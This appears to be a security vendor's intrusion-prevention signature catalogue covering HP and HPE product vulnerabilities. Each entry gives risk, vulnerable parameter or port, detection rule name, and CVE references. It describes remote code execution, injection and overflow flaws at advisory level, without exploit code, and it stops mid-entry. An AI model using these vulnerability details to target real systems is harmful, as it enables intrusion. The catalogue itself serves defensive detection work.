http://www.osvdb.org/84102

HP-StorageWorks-File-Migration-Agent-Rsaftp.dll-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in HP StorageWorks File Migration Agent

Risk:

High

First detected in:

sgpkg-ips-466-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP StorageWorks File Migration Agent

Type:

Buffer Overflow

Description:

There is a stack buffer overflow in HP StorageWorks. This vulnerability is due to insufficient validation of the size of the "root path" variable while processing FTP archive requests within RsaFTP.dll. A remote, unauthenticated attacker can exploit the vulnerability by sending overly long requests to File Migration Agent which listens on port TCP/9111. Exploitation may crash the application resulting in a denial of service and may also lead to arbitrary code execution.

Situation:

Generic_CS-HP-StorageWorks-File-Migration-Agent-Rsaftp.dll-Stack-Buffer-Overflow

References:

OSVDB-84102
http://www.osvdb.org/84102

HP-StorageWorks-Storage-Mirroring-Double-Take-Service-Code-Execution

About this vulnerability:

Buffer overflow vulnerability in the HP StorageWorks Storage Mirroring Double Take Service

Risk:

High

First detected in:

sgpkg-ips-156-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

HP StorageWorks Storage Mirroring

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the HP StorageWorks Storage Mirroring Double Take Service. The vulnerability allows a remote unauthenticated attacker to cause a denial of service or to execute arbitrary code with the privileges of the affected service, normally System.

Situation:

Generic_UDP-HP-StorageWorks-Storage-Mirroring-Double-Take-Service-Code-Execution
Generic_CS-HP-StorageWorks-Storage-Mirroring-Double-Take-Service-Code-Execution
Generic_CS-HP-StorageWorks-Storage-Mirroring-Buffer-Overflow-Exploit

References:

CVE-2008-1661
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1661

OSVDB-45924
http://www.osvdb.org/45924

HP-StorageWorks-Virtual-SAN-Appliance-Command-Execution

About this vulnerability:

An HP StorageWorks Virtual SAN Appliance Command Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-708-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP StorageWorks Virtual SAN Appliance

Type:

Input Validation

Description:

An input validation vulnerability in HP StorageWorks Virtual SAN Appliance, before version 9.5, which allows remote attackers to execute arbitrary commands via shell metacharacters in the second parameter.

Situation:

Generic_CS-HP-StorageWorks-Virtual-SAN-Appliance-Command-Execution

References:

CVE-2012-4361
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4361

OSVDB-82087
http://www.osvdb.org/82087

HP-System-Management-Homepage-Command-Injection

About this vulnerability:

A vulnerability in HP System Management Homepage (SMH)

Risk:

Moderate

First detected in:

sgpkg-ips-530-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP System Management Homepage

Type:

Input Validation

Description:

There is a command-injection vulnerability in HP System Management Homepage. The vulnerability is due to a failure to sanitize variables provided by a user over the network to the ginkgosnmp.inc script. A remote, authenticated attacker could exploit this vulnerability by sending a specially crafted request to the affected server. Successful exploitation could result in arbitrary command execution with elevated privileges.

Situation:

Generic_CS-System-Management-Homepage-Command-Injection
HTTP_CSU-System-Management-Homepage-Command-Injection

References:

CVE-2013-3576
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3576

BID-60471
http://www.securityfocus.com/bid/60471

OSVDB-94191
http://www.osvdb.org/94191

HP-System-Management-Homepage-Iprange-Parameter-Code-Execution

About this vulnerability:

A vulnerability in HP System Management Homepage (SMH)

Risk:

High

First detected in:

sgpkg-ips-520-5211

Last changed:

sgpkg-ips-1732-5242

Platform:

Generic

Software:

HP System Management Homepage

Type:

Buffer Overflow

Description:

A code execution vulnerability exists in HP System Management Homepage (SMH). The vulnerability is due to a flaw when handling the iprange parameter sent to the /proxy/DataValidation URL. A remote attacker can exploit this vulnerability by sending a malicious request to the affected server. A successful exploitation attempt could result in executing arbitrary code on the target server. Anonymous access must be enabled to trigger this vulnerability.

Situation:

HTTP_CSU-HP-System-Management-Homepage-Iprange-Parameter-Code-Execution

References:

OSVDB-91812
http://www.osvdb.org/91812

HP-System-Management-Homepage-Iprange-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in HP System Management Homepage (SMH)

Risk:

High

First detected in:

sgpkg-ips-539-5211

Last changed:

sgpkg-ips-1732-5242

Platform:

Generic

Software:

HP System Management Homepage

Type:

Buffer Overflow

Description:

A stack buffer overflow exists in HP System Management Homepage. The vulnerability is due to insufficient input validation when handling HTTP requests containing an iprange variable to the /proxy/DataValidation URI. The application copies the variable into a fixed size stack buffer, which could overflow. A remote unauthenticated attacker could exploit this vulnerability by sending a crafted request to the vulnerable service. Successful exploitation could result in arbitrary code execution in the context of the currently affected service, which is System by default.

Situation:

HTTP_CRL-HP-System-Management-Homepage-Iprange-Stack-Buffer-Overflow

References:

CVE-2013-2362
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2362

OSVDB-95489
http://www.osvdb.org/95489

HP-System-Management-Homepage-Red2301-Redirecturl-Cross-Site-Scripting

About this vulnerability:

A vulnerability in HP System Management Homepage (SMH)

Risk:

Moderate

First detected in:

sgpkg-ips-614-5211

Last changed:

sgpkg-ips-1453-5242

Platform:

Generic

Software:

HP System Management Homepage

Type:

Input Validation

Description:

A cross-site scripting vulnerability exists in HP's System Management Homepage (SMH). The vulnerability is due to an input validation error when handling 'RedirectUrl' parameter of red2301.html page. A remote attacker could exploit this vulnerability by enticing a target user to follow a malicious link. Successful exploitation of this vulnerability would result in execution of attacker-controlled script code in the browser of the target user in the security index of the vulnerable server.

Situation:

HTTP_CRL-HP-System-Management-Homepage-Red2301-Redirecturl-Cross-Site-Scripting

References:

CVE-2014-2640
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2640

OSVDB-112410
http://www.osvdb.org/112410

HP-Universal-CMDB-Default-Credentials-Arbitrary-File-Upload

About this vulnerability:

A vulnerability in HP Universal CMDB

Risk:

High

First detected in:

sgpkg-ips-603-5211

Last changed:

sgpkg-ips-1730-5242

Platform:

Generic

Software:

HP Universal CMDB Server

Type:

Malfunction

Description:

A code execution vulnerability exists in HP Universal CMDB. The vulnerability is due to the use of hard-coded credentials when processing HTTP requests. A remote attacker can upload arbitrary files to arbitrary locations using the default credentials. In a successful attack scenario, the attacker can execute arbitrary code with SYSTEM privileges by placing executable files in critical locations.

Situation:

HTTP_CRL-Apache-Axis2-Default-Credentials

References:

CVE-2014-2617
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2617

BID-68363
http://www.securityfocus.com/bid/68363

OSVDB-108717
http://www.osvdb.org/108717

HP-Universal-CMDB-Server-Axis2-Default-Credentials

About this vulnerability:

A vulnerability in HP Universal CMDB Server

Risk:

High

First detected in:

sgpkg-ips-374-4219

Last changed:

sgpkg-ips-1350-5242

Platform:

Generic

Software:

HP Universal CMDB Server

Type:

Malfunction

Description:

There is a vulnerability in HP Universal CMDB Server. The vulnerability is due to an authentication weakness in the product's configuration. When the software is installed, default credentials are assigned to the Axis2 web services component. A remote attacker can leverage this vulnerability to upload a malicious web service to a target system, enabling arbitrary code execution within the security context of an Axis2 web service.

Situation:

HTTP_CRL-Apache-Axis2-Default-Credentials

References:

CVE-2010-0219
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0219

OSVDB-70233
http://www.osvdb.org/70233

HP-UX-LPD-Buffer-Overflow

About this vulnerability:

An HP-UX LPD Buffer Overflow vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-735-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

lpd

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in the lp subsystem for HP-UX, 10.20 through 11.11, which allows remote attackers to cause a denial of service condition or possible execute arbitrary code.

Situation:

Printer_HP-UX-LPD-Buffer-Overflow

References:

CVE-2002-1473
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1473

OSVDB-9638
http://www.osvdb.org/9638

HP-UX-Remote-Line-Printer-Daemon-Logic-Flaw-Vulnerability

About this vulnerability:

A vulnerability in HP-UX Remote Line Printer Daemon

Risk:

High

First detected in:

sgpkg-ips-578-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

HP-UX

Software:

lpd

Type:

Malfunction

Description:

A vulnerability in HP-UX line printer daemon (rlpdaemon) in HP-UX 10.01 through 11.11 allows remote attackers to modify arbitrary files and gain root privileges via a certain print request.

Situation:

Printer_CS-HP-UX-Remote-Line-Printer-Daemon-Logic-Flaw-Vulnerability

References:

CVE-2001-0817
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0817

BID-3561
http://www.securityfocus.com/bid/3561

HP-VAN-SDN-Controller-Command-Injection

About this vulnerability:	A vulnerability in HP VAN SDN Controller
Risk:	High
First detected in:	sgpkg-ips-1151-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Linux;Unix
Software:	HP VAN SDN Controller
Type:	Code Injection
Description:	A vulnerability in HP VAN SDN Controller, versions <= 2.7.18.0503, which allows remote attackers to execute arbitrary code due to insufficient sanitization of the name parameter in the uninstall action.
Situation:	File-Text_HP-VAN-SDN-Controller-Command-Injection

HP-Virtual-Rooms-Install-Multiple-Remote-Buffer-Overflow-Vulnerabilities

About this vulnerability:	HP Virtual Rooms Install Multiple Remote Buffer Overflow Vulnerabilities
Risk:	Low
First detected in:	sgpkg-ips-632-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Any Operating System
Software:	HP Virtual Rooms
Type:	Malfunction
Description:	A vulnerability exists in HP Virtual Rooms.
Situation:	File-Text_HP-Virtual-Rooms-Install-Multiple-Remote-Buffer-Overflow-Vulnerabilities

HP-Web-Jetadmin

About this vulnerability:

A vulnerability in HP Web JetAdmin

Risk:

High

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

HP Web JetAdmin

Type:

Input Validation

Description:

There are multiple vulnerabilities within HP Web JetAdmin, a web based software program developed by Hewlett Packard. It is possible, through the use of multiple vulnerabilities, for the attacker to execute arbitrary code on the remote server running HP Web JetAdmin in a ROOT level context. Issue 1: There is no difference in the behaviour of a server running a vulnerable version of HP Web JetAdmin when encountering the uploading of a real firmware update versus any other type of file (i.e. "hts file, executable"). Issue 2: The target will include the specified file in the HTTP reply content. The file data begins right after the HTTP header and ends two line-feeds (a 0x0A character) before the <html> tag. Issue 3: The behaviour of the attack target depends entirely on the input injected by the attacker into the malicious request.

Situation:

HTTP_CRL-HP-Web-Jetadmin

References:

CVE-2004-1856
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1856

BID-9971
http://www.securityfocus.com/bid/9971

HPE-Data-Protector-Exec_Bar-Username-Buffer-Overflow

About this vulnerability:

A vulnerability in HPE Data Protector

Risk:

Moderate

First detected in:

sgpkg-ips-777-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Data Protector

Type:

Buffer Overflow

Description:

An improper boundary check in HPE Data Protector results in a buffer overflow vulnerability. A successful exploitation allows an attacker to run arbitrary code with SYSTEM privileges.

Situation:

Generic_CS-HPE-Data-Protector-Exec_Bar-Username-Buffer-Overflow

References:

CVE-2016-2005
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2005

HPE-IMC-Accessmgrservlet-Classname-Insecure-Deserialization

About this vulnerability:

A vulnerability in HP Intelligent Management Center

Risk:

Moderate

First detected in:

sgpkg-ips-1166-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Intelligent Management Center

Type:

Input Validation

Description:

Insecure deserialization of untrusted data causes a vulnerability in HPE Intelligent Management Center. A successful exploit may allow a remote attacker to execute code on the target with system privileges.

Situation:

File-Binary_HPE-Intelligent-Management-Center-Accessmgrservlet-Classname-Insecure-Deserialization

References:

CVE-2019-11945
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11945

HPE-IMC-Customreporttemplateselectbean-Expression-Language-Injection

About this vulnerability:

A vulnerability in HP Intelligent Management Center

Risk:

Moderate

First detected in:

sgpkg-ips-1192-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Intelligent Management Center

Type:

Input Validation

Description:

Improper handling of untrusted data in URL parameters causes a vulnerability in HPE Intelligent Management Center. A successful exploit may allow a remote attacker to execute code on the target with system privileges.

Situation:

HTTP_CRL-HPE-IMC-Customreporttemplateselectbean-Expression-Language-Injection

References:

CVE-2019-5373
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5373

HPE-IMC-Deployselectbootrom-Expression-Language-Injection

About this vulnerability:	A vulnerability in HP Intelligent Management Center
Risk:	Moderate
First detected in:	sgpkg-ips-1263-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	HP Intelligent Management Center
Type:	Input Validation
Description:	Improper handling of request parameters causes an expression language injection vulnerability in HPE Intelligent Management Center. A successful exploit may allow an attacker to execute arbitrary code on the target system.
Situation:	HTTP_CRL-HPE-IMC-Deployselectbootrom-Expression-Language-Injection

HPE-IMC-Devgroupselect-Expression-Language-Injection

About this vulnerability:	A vulnerability in HP Intelligent Management Center
Risk:	Moderate
First detected in:	sgpkg-ips-1261-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	HP Intelligent Management Center
Type:	Input Validation
Description:	Improper handling of request parameters causes an expression language injection vulnerability in HPE Intelligent Management Center. A successful exploit may allow an attacker to execute arbitrary code on the target system.
Situation:	HTTP_CRL-HPE-IMC-Devgroupselect-Expression-Language-Injection

HPE-IMC-Forwardredirect-Expression-Language-Injection

About this vulnerability:	A vulnerability in HP Intelligent Management Center
Risk:	Moderate
First detected in:	sgpkg-ips-1233-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	HP Intelligent Management Center
Type:	Input Validation
Description:	Improper handling of payload in HTTP requests causes an expression language injection vulnerability in HP Intelligent Management Center. A successful exploit may allow an attacker to execute arbitrary code with system privileges.
Situation:	HTTP_CRL-HPE-IMC-Forwardredirect-Expression-Language-Injection

HPE-IMC-Iccselectdevtypebean-Expression-Language-Injection

About this vulnerability:

A vulnerability in HP Intelligent Management Center

Risk:

Moderate

First detected in:

sgpkg-ips-1183-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Intelligent Management Center

Type:

Input Validation

Description:

Insufficient validation of the beanName request parameter by the IccSelectDevTypeBean class causes an expression language vulnerability in HPE Intelligent Management Center. A successful exploit may allow an attacker to execute arbitrary code with system privileges.

Situation:

HTTP_CSU-HPE-Intelligent-Management-Center-Iccselectdevtypebean-Expression-Language-Injection

References:

CVE-2019-11941
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11941

HPE-IMC-Ictexpertdownload-Expression-Language-Injection

About this vulnerability:

A vulnerability in HPE iMC PLAT

Risk:

Moderate

First detected in:

sgpkg-ips-974-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HPE iMC PLAT

Type:

Input Validation

Description:

Bad handling of the beanName parameter in a HTTP request causes an expression language injection vulnerability in HPE iMC PLAT. A successful exploit allows an attacker to execute arbitrary code withouth authentication on the target system with system-level privileges.

Situation:

HTTP_CRL-HPE-Intelligent-Management-Center-Ictexpertdownload-Expression-Language-Injection

References:

CVE-2017-12500
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12500

HPE-IMC-Icttableexporttocsvbean-Expression-Language-Injection

About this vulnerability:

A vulnerability in HP Intelligent Management Center

Risk:

Moderate

First detected in:

sgpkg-ips-1185-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Intelligent Management Center

Type:

Input Validation

Description:

Improper handling of the beanName request parameter by the IctTableExportToCSVBean class causes an expression language vulnerability in HPE Intelligen Management Center. A successful exploit allows an attacker to run arbitrary code with system privileges.

Situation:

HTTP_CRL-HPE-Intelligent-Management-Center-Icttableexporttocsvbean-Expression-Language-Injection

References:

CVE-2019-5370
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5370

HPE-IMC-Operatorgrouptreeselectbean-Expression-Language-Injection

About this vulnerability:

A vulnerability in HP Intelligent Management Center

Risk:

Moderate

First detected in:

sgpkg-ips-1189-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Intelligent Management Center

Type:

Input Validation

Description:

Improper handling of the beanName request parameter by the OperatorGroupTreeSelectBean class causes an expression language injection vulnerability in HPE IMC. A successful exploit may allow an attacker to run arbitrary code on the target with system privileges.

Situation:

HTTP_CRL-HPE-IMC-Operatorgrouptreeselectbean-Expression-Language-Injection

References:

CVE-2019-5374
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5374

HPE-IMC-Plat-Redirectservlet-Parafile-Directory-Traversal

About this vulnerability:

A vulnerability in HPE iMC PLAT

Risk:

Moderate

First detected in:

sgpkg-ips-869-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HPE iMC PLAT

Type:

Directory Traversal

Description:

Improper input validation causes a directory traversal vulnerability in HPE iMC PLAT. A successful exploitation can allow an attacker to cause a denial of service condition on the target.

Situation:

HTTP_CRL-HPE-Intelligent-Management-Center-Plat-Redirectservlet-Parafile-Directory-Traversal

References:

CVE-2016-8530
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8530

HPE-IMC-Saveselecteddevices-Expression-Language-Injection

About this vulnerability:

A vulnerability in HPE iMC PLAT

Risk:

Moderate

First detected in:

sgpkg-ips-986-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HPE iMC PLAT

Type:

Input Validation

Description:

Insufficient validation of RPC requests causes an expression language injection vulnerability in HPE iMC PLAT. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

File-Text_HPE-Intelligent-Management-Center-Saveselecteddevices-Expression-Language-Injection

References:

CVE-2017-12491
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12491

HPE-IMC-Sshconfig-Expression-Language-Injection

About this vulnerability:	A vulnerability in HP Intelligent Management Center
Risk:	Moderate
First detected in:	sgpkg-ips-1268-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	HP Intelligent Management Center
Type:	Input Validation
Description:	Improper handling of request parameters causes an expression language injection vulnerability in HPE Intelligent Management Center. A successful exploit may allow an attacker to execute arbitrary code on the target system.
Situation:	HTTP_CRL-HPE-IMC-Sshconfig-Expression-Language-Injection

HPE-IMC-Topomsgservlet-Classname-Expression-Language-Injection

About this vulnerability:

A vulnerability in HP Intelligent Management Center

Risk:

Moderate

First detected in:

sgpkg-ips-1180-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Intelligent Management Center

Type:

Input Validation

Description:

Situation:

File-Binary_HPE-IMC-Topomsgservlet-Classname-Expression-Language-Injection

References:

CVE-2019-11942
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11942

HPE-IMC-Tvxlanlegendbean-Expression-Language-Injection

About this vulnerability:	A vulnerability in HP Intelligent Management Center
Risk:	High
First detected in:	sgpkg-ips-1226-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	HP Intelligent Management Center
Type:	Input Validation
Description:	An Expression Language injection vulnerability has been reported in HPE Intelligent Management Center. This vulnerability is due to insufficient handling of the beanName request parameter by the TvxlanLegendBean class. A remote attacker could exploit these vulnerabilities by sending a crafted request to the target service. Successful exploitation results in the execution of arbitrary code under the security context of the SYSTEM user.
Situation:	HTTP_CRL-HPE-IMC-Tvxlanlegendbean-Expression-Language-Injection

HPE-IMC-Userselectpagingcontent-Expression-Language-Injection

About this vulnerability:

A vulnerability in HPE iMC PLAT

Risk:

Moderate

First detected in:

sgpkg-ips-986-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HPE iMC PLAT

Type:

Input Validation

Description:

Insufficient handling of the beanName request parameter on userSelectPagingContent causes an expression language injection vulnerability in HPE iMC PLAT. A successful exploit allows an attacker to execute arbitrary code on the target system with system privileges.

Situation:

HTTP_CRL-HPE-Intelligent-Management-Center-Userselectpagingcontent-Expression-Language-Injection

References:

CVE-2017-12521
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12521

HPE-IMC-Webdmdebugservlet-Insecure-Deserialization

About this vulnerability:

A vulnerability in HP Intelligent Management Center

Risk:

Moderate

First detected in:

sgpkg-ips-1322-5242

Last changed:

sgpkg-ips-1322-5242

Platform:

Generic

Software:

HP Intelligent Management Center

Type:

Input Validation

Description:

Insecure serialization of untrusted data causes a vulnerability in HP Intelligent Management Center. A successful exploit can allow an attacker to run arbitrary code on the target system with system privileges.

Situation:

HTTP_CRL-HPE-IMC-Center-Webdmdebugservlet-Insecure-Deserialization

References:

CVE-2017-12557
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12557

HPE-Insight-Remote-Support-Processatatchmentdatastream-Directory-Traversal

About this vulnerability:

A vulnerability in HPE Insight Remote Support

Risk:

Moderate

First detected in:

sgpkg-ips-1837-5242

Last changed:

sgpkg-ips-1837-5242

Platform:

Generic

Software:

HPE Insight Remote Support

Type:

Directory Traversal

Description:

The lack of proper validation of a user-supplied path in processAtatchmentDataStream function causes a directory traversal vulnerability in HPE Insight Remote Support. A successful exploitation may allow an attacker to execute code on the target system.

Situation:

File-TextId_HPE-Insight-Remote-Support-Processatatchmentdatastream-Directory-Traversal

References:

CVE-2024-53676
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-53676

HPE-Insight-Remote-Support-SetInputStream-XML-External-Entity-Injection

About this vulnerability:

A vulnerability in HPE Insight Remote Support

Risk:

Moderate

First detected in:

sgpkg-ips-1849-5242

Last changed:

sgpkg-ips-1849-5242

Platform:

Generic

Software:

HPE Insight Remote Support

Type:

Input Validation

Description:

The lack of proper validation of a user-supplied XML data in setInputStream function causes an external entity injection vulnerability in HPE Insight Remote Support. A successful exploitation allows an attacker to make the target download and parse arbitrary XML documents and possibly disclose sensitive information.

Situation:

File-Text_HPE-Insight-Remote-Support-SetInputStream-XML-External-Entity-Injection-CVE-2024-11622

References:

CVE-2024-11622
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-11622

HPE-Insight-Remote-Support-XML-External-Entity-Injection-CVE-2024-53675

About this vulnerability:

A vulnerability in HPE Insight Remote Support

Risk:

High

First detected in:

sgpkg-ips-1846-5242

Last changed:

sgpkg-ips-1846-5242

Platform:

Generic

Software:

HPE Insight Remote Support

Type:

Input Validation

Description:

An XXE vulnerability has been reported in HPE Insight Remote Support. The vulnerability is due to the lack of proper validation of a user-supplied XML data in validateAgainstXSD function. Successful exploitation results in information disclosure.

Situation:

File-TextId_HPE-Insight-Remote-Support-XML-External-Entity-Injection-CVE-2024-53675

References:

CVE-2024-53675
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-53675

HPE-Integrated-Lights-Out-CVE-2017-12542

About this vulnerability:

A vulnerability in HPE iLO

Risk:

High

First detected in:

sgpkg-ips-1322-5242

Last changed:

sgpkg-ips-1322-5242

Platform:

Generic

Software:

HPE iLO

Type:

Buffer Overflow

Description:

There exists an authentication bypass and remote code execution vulnerability in HPE Integrated Lights Out 4 (iLO 4) due to improper handling of overlong Connection headers.

Situation:

HTTP_CSH-HPE-Integrated-Lights-Out-CVE-2017-12542

References:

CVE-2017-12542
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12542

HPE-Intelligent-Management-Center-Accessmgrservlet-Insecure-Deserialization

About this vulnerability:

A vulnerability in HP Intelligent Management Center

Risk:

Moderate

First detected in:

sgpkg-ips-866-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Intelligent Management Center

Type:

Input Validation

Description:

Insecure deserialization of user-supplied data causes a vulnerability in HPE Intelligent Management Center. A successful exploitation allows an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CS-HPE-Intelligent-Management-Center-Accessmgrservlet-Insecure-Deserialization

References:

CVE-2017-5790
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5790

HPE-Intelligent-Management-Center-Amf3-Externalizable-Deserialization

About this vulnerability:

A vulnerability in HP Intelligent Management Center

Risk:

Moderate

First detected in:

sgpkg-ips-1197-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Intelligent Management Center

Type:

Input Validation

Description:

There exists an insecure deserialization vulnerability in HPE Intelligent Management Center. This vulnerability could be exploited by an unauthenticated, remote attacker. Successful exploitation could lead in arbitrary code execution.

Situation:

HTTP_CRL-HPE-Intelligent-Management-Center-Amf3-Externalizable-Deserialization

References:

CVE-2019-11944
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11944

HPE-Intelligent-Management-Center-Bytemessageresource-Insecure-Deserialization

About this vulnerability:

A vulnerability in HP Intelligent Management Center

Risk:

Moderate

First detected in:

sgpkg-ips-1196-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Intelligent Management Center

Type:

Input Validation

Description:

There exists an insecure deserialization vulnerability in HPE Intelligent Management Center. This vulnerability could be exploited remotely by an authenticated attacker. Successful exploitation could lead in arbitrary code execution.

Situation:

HTTP_CRL-HPE-Intelligent-Management-Center-Bytemessageresource-Insecure-Deserialization

References:

CVE-2019-11956
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11956

HPE-Intelligent-Management-Center-Dbman-Backupzipfile-Command-Injection

About this vulnerability:

A vulnerability in HP Intelligent Management Center

Risk:

High

First detected in:

sgpkg-ips-942-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Intelligent Management Center

Type:

Input Validation

Description:

There exists a command injection vulnerability in HPE Intelligent Management Center. A remote attacker can use this to execute arbitrary commands on the affected system.

Situation:

Generic_CS-HPE-Intelligent-Management-Center-Dbman-Zipfile-Command-Injection

References:

CVE-2017-5820
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5820

HPE-Intelligent-Management-Center-Dbman-decryptMsgAes-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in HPE Intelligent Management Center

Risk:

High

First detected in:

sgpkg-ips-1144-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Intelligent Management Center

Type:

Buffer Overflow

Description:

A stack-based buffer overflow vulnerability in the dbman component of HP Intelligent Management Center, versions prior to 7.3 E0605P06, which allows remote attcakers to execute arbitrary code, due to the lack of proper validation of the length of user supplied data.

Situation:

Generic_CS-HPE-Intelligent-Management-Center-Dbman-decryptMsgAes-Stack-Buffer-Overflow

References:

CVE-2018-7114
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7114

HPE-Intelligent-Management-Center-Dbman-FileTrans-Arbitrary-File-Write

About this vulnerability:

An HPE Intelligent Management Center Dbman FileTrans Arbitrary File Write vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-937-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows; Linux

Software:

HP Intelligent Management Center

Type:

Directory Traversal

Description:

An arbitrary file write vulnerability in HP Intelligent Management Center, versions prior to 7.3 E0504P04, in the dbman component, which allows remote attackers to write arbitrary files and possibly execute remote code by sending a crafted packet to the target server.

Situation:

Generic_CS-HPE-Intelligent-Management-Center-Dbman-FileTrans-Arbitrary-File-Write

References:

CVE-2017-5822
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5822

HPE-Intelligent-Management-Center-Dbman-Opcode-10003-Filename-DoS

About this vulnerability:

A vulnerability in HP Intelligent Management Center

Risk:

High

First detected in:

sgpkg-ips-1177-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Intelligent Management Center

Type:

Malfunction

Description:

A vulnerability in HP Intelligent Management Center, versions 7.3 E0506P09 and prior, which allows remote attackers to cause a denial of service condition on the target server by sending a maliciously crafted packet, due to an unhandled exception in the fileName field using opcode 10003.

Situation:

Generic_CS-HPE-Intelligent-Management-Center-Dbman-Opcode-10003-Filename-DoS

References:

CVE-2019-5355
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5355

HPE-Intelligent-Management-Center-Dbman-Opcode-10014-DoS

About this vulnerability:

A vulnerability in HPE Intelligent Management Center

Risk:

High

First detected in:

sgpkg-ips-1179-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Intelligent Management Center

Type:

Insecure Configuration

Description:

A vulnerability in HPE Intelligent Management Center, versions 7.3 E0506P09 and before, which allows a remote attacker to cause a denial of service condition by sending a crafted packet using opcode 10014, due to an undocumented "kill" command.

Situation:

Generic_CS-HPE-Intelligent-Management-Center-Dbman-Opcode-10014-DoS

References:

CVE-2018-7123
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7123

HPE-Intelligent-Management-Center-Dbman-Restartdb-Command-Injection

About this vulnerability:

A vulnerability in HP Intelligent Management Center

Risk:

Moderate

First detected in:

sgpkg-ips-938-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Intelligent Management Center

Type:

Input Validation

Description:

Improper validation of user-supplied request data causes a command injection vulnerability in HP Intelligent Management Center. A successful exploit allows an attacker to execute arbitrary commands with system privileges.

Situation:

Generic_CS-Intelligent-Management-Center-Dbman-Restartdb-Command-Injection

References:

CVE-2017-5816
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5816

HPE-Intelligent-Management-Center-Dbman-Restoredbase-SQL-Command-Injection

About this vulnerability:

A vulnerability in HP Intelligent Management Center

Risk:

Moderate

First detected in:

sgpkg-ips-972-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

HP Intelligent Management Center

Type:

Input Validation

Description:

